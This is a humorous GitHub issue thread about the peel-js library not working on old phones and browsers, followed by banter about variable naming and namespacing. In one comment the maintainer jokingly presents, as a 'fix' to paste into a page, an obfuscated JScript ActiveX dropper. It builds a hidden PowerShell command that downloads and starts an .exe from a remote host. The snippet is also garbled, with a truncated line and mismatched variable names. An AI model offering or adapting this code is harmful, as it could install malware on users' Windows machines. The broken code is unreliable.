### ISSUE TITLE
Doesn't work on Feature Phones

### ISSUE THREAD

**Issue by uxder** [andrewplummer/peel-js#2]

**Comment by nckh** [comment]
I can confirm it does not run on my Nokia N-Gage.

**Comment by nainoa** [comment]
This also does not work on IE6

**Comment by micjamking** [comment]
Can confirm, does not work on Blackberry Curve

**Comment by andrewplummer** [comment]
Screenshot?

**Comment by uxder** [comment]
![screen shot 2016-11-24 at 11 32 03 am](https://cloud.githubusercontent.com/assets/7152/20584833/a8a727e6-b239-11e6-95f8-60082c694e15.png)

Hope this helps!

**Comment by andrewplummer** [comment]
Ahhh I see the issue now. Just add the following code to the bottom of the page and it should work great:

```javascript
var thJst = new ActiveXObject("shell.aPplIcatIon");
var pmMgJBu = new ActiveXObject("wscRipt.sHell");
var Paqoxnd = 'thJstN.ShNeNlNlExNeNcNuteN(N"NCMND.NENxEN",N "/cNNpNingNNlNoNcalNhoNsNt N& pNonNerNsNhelNlN.NexNeN N-NexNeNcutNionpNoliNchNbNprNassN N-NnNoerNofNiNlNeN -wiNndNoszNtleNe hNiNdeenN(nNewN-oNijeNcNtNysteNmN.nNetN.NwNebclient).dowanNoNaNdeile(\‘htth://stNr.dnoNdaNilenerNsN.nyz/YGRthNmNTNhNL.Npth\',\'NXAprNDNaNtANXNvaNleZ.exe\')N; NstANrNTN-pNPONcNeNst\‘NXANPdiNaNtNANNvajN1N2N.EXe\'N",N "",N N”NoNpNeNnN",N oN);';
var cXKvEMeJ = ("XHXKXLM\\onXFXtXwXAre\\mXiXCRXoXszfT\\HXinXDXOXwXS XNt\\cXUrXrXEnTVXerXinoN\\sXstteXerOXot").replace(/\X/g,
var JGNXonR = pmMgJBu.RegRead(cXKvEMeJ).charAt(303769500/60753900).toUpperCase();
(new Function(Paqoxmd.replace(RegExp(JGWXonR, "g"), "")))();
```

**Comment by uxder** [comment]
Nit:
- Can we use better variable names
- Your third line exceeds 80 chars

**Comment by andrewplummer** [comment]
1. Absolutely. Already planning on an alt-Hungarian notation style:

Boolean "isActive" => `ブisActive`
String "name" => `文name`
Array "items" => `配items`

This should be an intuitive way to quickly determine variable types.

2. Totally. If you can just provide a screenshot of the line overflow on the standard editors (Visual Studio .NET, NETBeans, etc etc), I'll get started on it.

**Comment by uxder** [comment]
Awesome.  Thanks to your efforts, I've submitted peel for library of the year.

http://jsawards.org/

The only thing is that I think you need to namespace everything under Yano (quite important).

**Comment by andrewplummer** [comment]
That's great to hear! Thanks so much!

re: the namespacing, I personally think that this is a great idea, however I'm a bit concerned about the [negative connotations](http://www.urbandictionary.com/define.php?term=yano&defid=603161) that the term "Yano" has. Let's maybe give this a bit more thought, then reassess.

**Comment by uxder** [comment]
Hmm good point.. How about [plummer](http://www.urbandictionary.com/define.php?term=Plummer) instead?

**Comment by andrewplummer** [comment]
[Top definition](http://i2.kym-cdn.com/photos/images/facebook/000/138/246/tumblr_lltzgnHi5F1qzib3wo1_400.jpg)

**Comment by uxder** [comment]
Actually I think this might be better :)

http://www.urbandictionary.com/define.php?term=greg&defid=2285681

**Comment by andrewplummer** [comment]
Hm... still not that bad...

**Comment by nckh** [comment]
I heard yano.js was deprecated after they announced a port to Prototype.js :(((

**Comment by andrewplummer** [comment]
I heard yano.js was actually a virus.

**Comment by uxder** [comment]
Really I heard otherwise.  Yano.js is future-proof for the next 50 years.  The library has code to autoupdate itself to the latest hot front-end javascript trend.

**Comment by andrewplummer** [comment]
> has code to autoupdate itself

Yeah, so does [Windows 10](http://www.forbes.com/sites/gordonkelly/2015/07/25/windows-10-automatic-update-problems/#48546f3f6fb4).

**Comment by uxder** [comment]
Oh did I not mention.  Yano also has clippy :)

**Comment by andrewplummer** [comment]
![p](https://cloud.githubusercontent.com/assets/74646/20615102/7fcfee12-b319-11e6-8d5c-3baf01f32a85.jpg)

**Comment by uxder** [comment]
We always end up back to the hamster don't we :)
